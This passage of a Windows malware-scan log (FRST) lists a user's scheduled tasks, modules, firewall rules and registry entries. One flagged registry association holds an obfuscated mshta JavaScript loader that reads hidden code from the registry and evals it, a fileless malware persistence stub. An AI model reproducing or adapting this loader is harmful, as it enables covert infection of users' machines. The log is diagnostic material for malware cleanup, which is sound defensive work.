CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0A6FCFBF-96B1-40CB-97E3-794BCDC6F58D} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {0BCFA1A1-1EC5-4C87-9B57-941443E89977} - System32\Tasks\{7FD848FE-342B-446D-9D31-7734C94947D8} => pcalua.exe -a C:\Users\Nekut\Downloads\gtasa120cz\gtasa120cz.exe -d C:\Users\Nekut\Downloads\gtasa120cz
Task: {14D797F9-BB6D-4144-9C3D-88C2500CDCBF} - System32\Tasks\COMODO\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {196522D8-4BD8-4B31-9FB8-ACCC7A483E1C} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {325CB902-3891-4E6E-BA9D-28F802BC176F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {3A6CCA04-E5F4-4F90-A680-A9A5F23F824A} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-12-28] (COMODO)
Task: {49E243E0-ACAD-4373-A823-590D9DB02FB3} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {5A92D064-2115-424F-B351-9FC49340E33C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {6899F673-0F07-468E-91E7-4E56DB0619BD} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
Task: {6D5927DD-BEE1-4A03-B7E2-2F0A02CC0EAF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-26] (Adobe Systems Incorporated)
Task: {77FC23CE-5778-4997-86B6-0AF9DAB6C840} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {8018887D-23B5-49E9-8F6E-9CB31F63A62B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-02-23] (NVIDIA Corporation)
Task: {9C974213-F562-4CFD-9A9D-4D8A098C7FC6} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-03-14] (Microsoft Corporation)
Task: {A345A326-3A14-4A3E-94B7-67267B52B398} - System32\Tasks\COMODO\COMODO Maintenance {947247B5-026A-4437-9371-770782BE839D} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {A4444133-6A7C-4E6D-B090-92C841E301BC} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {AD71B9D6-2F01-49C5-B83B-76A1EA3B8567} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-11-15] (Piriform Ltd)
Task: {B0A7E0C4-9457-4CE3-848D-39E42D97A27E} - System32\Tasks\Process Lasso Core Engine Only => C:\Program Files\Process Lasso\processgovernor.exe [2016-05-14] (Bitsum LLC)
Task: {CD657602-AFE7-44B3-9A17-AEFCE46EFB45} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-02-23] (NVIDIA Corporation)
Task: {D8F861CA-EAE2-4146-859A-E6905C624F61} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-02-23] (NVIDIA Corporation)
Task: {DA40F702-D2CF-4F91-9255-A83784B68B66} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {DAAE4093-1005-4A30-B9A8-A828D3FF22D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {E47E59FE-19EC-43C8-B8ED-E60CA8049AF6} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EC723377-1EB3-4815-804B-63A20A982CCA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EF979201-DB6D-4829-A4FF-7E323A52458E} - System32\Tasks\Process Lasso Management Console (GUI) => C:\Program Files\Process Lasso\processlasso.exe [2016-05-14] (Bitsum LLC)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Nekut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files (x86)\Simple Port Forwarding\basic_ui.bat ()
==================== Loaded Modules (Whitelisted) ==============
2016-10-01 14:49 - 2017-02-23 19:35 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264528 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-12-28 00:17 - 2016-12-28 00:17 - 00155320 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdwrhlp.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00107704 _____ () C:\Program Files\COMODO\COMODO Internet Security\cavwpps.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00179896 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdcomps.dll
2016-03-16 10:25 - 2016-03-16 10:25 - 00073912 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-09-27 18:02 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 18:57 - 2016-09-27 18:57 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 18:34 - 2017-03-04 07:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-14 18:35 - 2017-03-04 07:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-03-14 18:35 - 2017-03-04 07:08 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-03-13 16:26 - 2017-03-13 16:26 - 00182784 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 41048064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 02236896 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\roottools.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00165376 _____ () C:\Program Files\Autodesk\Autodesk Sync\qjson_Ad_0.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00050176 _____ () C:\Program Files\Autodesk\Autodesk Sync\QtSolutions_MFCMigrationFramework_Ad_2.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00062464 _____ () C:\Program Files\Autodesk\Autodesk Sync\qoauth_Ad_1.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00932864 _____ () C:\Program Files\Autodesk\Autodesk Sync\qca_Ad_2.dll
2016-11-15 21:25 - 2016-11-15 21:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1029.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 01872384 _____ () C:\Windows\System32\speech_onecore\engines\tts\MSTTSEngine_OneCore.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00061968 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00110608 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-01 14:49 - 2017-02-23 19:34 - 65708992 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-01 14:49 - 2017-02-23 15:30 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-01 14:49 - 2017-02-23 15:30 - 02443320 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00385592 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00543288 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00468536 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-12-02 18:51 - 2013-09-23 18:52 - 00043912 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_MFCMigrationFramework_Ad_2.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00052224 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qoauth_Ad_1.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00195584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson_Ad_0.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00742400 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qca_Ad_2.dll
2016-12-02 18:51 - 2016-07-01 07:05 - 00285632 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\cs-CZ\AdWingManRes.dll
2016-12-02 18:51 - 2015-09-08 07:31 - 40640808 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libcef.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00912384 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libglesv2.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00134144 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libegl.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00950272 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\ffmpegsumo.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\.scr: AutoCADScriptFile => C:\WINDOWS\system32\notepad.exe "%1"
HKU\.DEFAULT\Software\Classes\d313270: "C:\WINDOWS\system32\mshta.exe" "javascript:TW9QKQ5="M";W1H=new ActiveXObject("WScript.Shell");dyF0py="TdPGlWw";pLJ3D=W1H.RegRead("HKCU\\software\\evzi\\ivvn");grWNe4t7="hCDpe";eval(pLJ3D);Atr0SAD="gO8Gu";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-10 12:04 - 2017-03-15 21:01 - 00000753 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nekut\Downloads\20_15544_8b2ef1afed30ce1.jpg
DNS Servers: 192.168.1.20 - 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Overwolf"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Steam"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2C739945-6CE6-401C-8A56-413B9047BC52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{CEC4E7E5-5CA4-4D2E-8536-AF3057B4112F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{C64359FC-D344-466D-81FC-4B5A7D613C8A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A3A84145-F305-4467-80F6-E8F059E7B38C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{28BF43FB-6E17-4BC9-B664-FE60A3E1F795}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [TCP Query User{960FC5A6-B689-4D0C-8CB3-5B6B13E8A252}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [UDP Query User{70EA34E7-D380-4AA7-B630-E44F9EBDBF55}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{D9BE0F07-713A-4C7D-BBF5-69E6D3AA456C}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [{C932D19A-83C5-4E9A-8621-7FB1E16B9FE4}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{842EEF74-E01B-4251-B14F-AE52F479B695}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{4AAE633B-A344-46AA-A0FB-B65C5CA8EEC0}] => (Allow) LPort=35359
FirewallRules: [{E234A8A0-FC92-477F-8D96-BC8EA9736C02}] => (Allow) LPort=35359
FirewallRules: [UDP Query User{445AEBC2-7551-4859-BF7C-B7EFBA93C718}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [TCP Query User{D39FC987-5695-45D9-B471-72A6E8EDF82C}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [UDP Query User{1D4275C1-B96B-4321-BEDC-BDB9441F005F}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [TCP Query User{7D6632F2-6401-4B58-BD71-E308C0E2862C}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [{D6B0B055-BA21-42F9-AF82-8EB6B0671EDB}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B13B5683-96DA-40C9-853F-83D8F1E8311E}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{6BC96264-0C0F-4DEE-AB7B-ED060088B268}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{55383924-F7BA-4E9A-93F9-3D4FBD194AF5}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{89C2649E-DA28-44E7-9C1C-710EB2B4F806}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{062BE7E7-2737-4786-8441-2C486848EA6A}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{EFE6DE3A-FFDF-4504-B2DF-F76E64C3F15A}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{23FAB33E-4807-42AA-AFA6-C67BD22A5BB0}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{6C19374D-7CAC-45A0-BE25-1EB2CFAC0480}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [UDP Query User{D9347118-9F09-415C-8677-2B4CA99BA2CE}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [TCP Query User{FAE0DFDF-A5DC-4765-A413-26A05ECF7B34}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{FF2639AC-4628-4B1F-A2B9-25BDE7E932D5}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{D73CD750-448A-4059-91CB-0D9901C5BD6B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0F4A6118-DBD6-40C8-9569-8EF064AD8433}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{B5279392-29B4-4ABE-AB30-85E6B994F9E9}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{15CE73A5-271D-44E2-9066-F9FAD9DF43DD}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [UDP Query User{33F8D17D-D01D-4B70-B3A7-699CA0960C4F}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [{B3390D60-A055-4799-8928-7985E45D5073}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{119C46D2-D69F-4916-93D0-A492D3018FA3}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{D2B8970F-A339-455F-9BF2-551BE7A0AF7A}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{A84C5F67-63EF-40CF-8097-67C4F89AA0FE}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [TCP Query User{F8FC7D3F-4200-47CB-95A3-7DF412DD1D9B}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [UDP Query User{51EB5D95-5A2C-4F83-8850-D2946515AE58}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [{986167C5-E51F-4C37-BB35-97E62DEEBE01}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{7C3F5ED7-3192-42E0-8A9E-77E040E4AD9F}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{137FC7D5-30B5-4BBA-A710-8283E6609937}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{297E11F7-F88D-4C77-9C9E-55BD784FF74E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{9CFB2900-ED4C-4409-80AD-6D01C922FF13}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C767A13B-406C-4B07-B639-7EADA888EA8F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0807AA42-C8B9-4D19-B4E5-DB8DB628D0C6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [TCP Query User{6834D14F-6071-4035-BD73-4DAAC949DDEF}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [UDP Query User{BAFB7D01-629D-446C-8553-FCC0E87B72C4}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [TCP Query User{1537CADF-6729-42B5-94CD-413F17548A1C}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [UDP Query User{D939E31F-AE2F-4685-909F-B6DAAB94D96E}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [TCP Query User{B44FE750-634B-4269-BB85-33B46F6758AD}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [UDP Query User{8664C386-999B-4BD2-9229-BEC8EC119384}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [TCP Query User{28811D0E-1839-44CC-917C-A453AA19F38F}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{5072A21D-4055-4A7F-A331-95093DD4FC06}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{33263AE2-FE54-40B1-A6D2-2E75CD0F8ACC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F5F55D69-1237-4BF8-B325-8F0F8F18536C}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [UDP Query User{8EA80FD9-0C40-4D26-846A-114D98451260}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [{099E4F8C-7A71-4C04-8B64-B0AE458750F4}] => (Allow) C:\Program Files (x86)\GameforgeLive\gfl_client.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
==================== Restore Points =========================
Could not list restore points
Check "winmgmt" service or repair WMI.
==================== Faulty Device Manager Devices =============
Could not list Devices. Check "winmgmt" service or repair WMI.
==================== Event log errors: =========================
Could not start eventlog service, could not read events.
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
Percentage of memory in use: 20%
Total physical RAM: 16339.81 MB
Available physical RAM: 12949.95 MB
Total Virtual: 16339.81 MB
Available Virtual: 13025.66 MB
==================== Drives ================================
Drive c: (Systém) (Fixed) (Total:194.76 GB) (Free:64.23 GB) NTFS
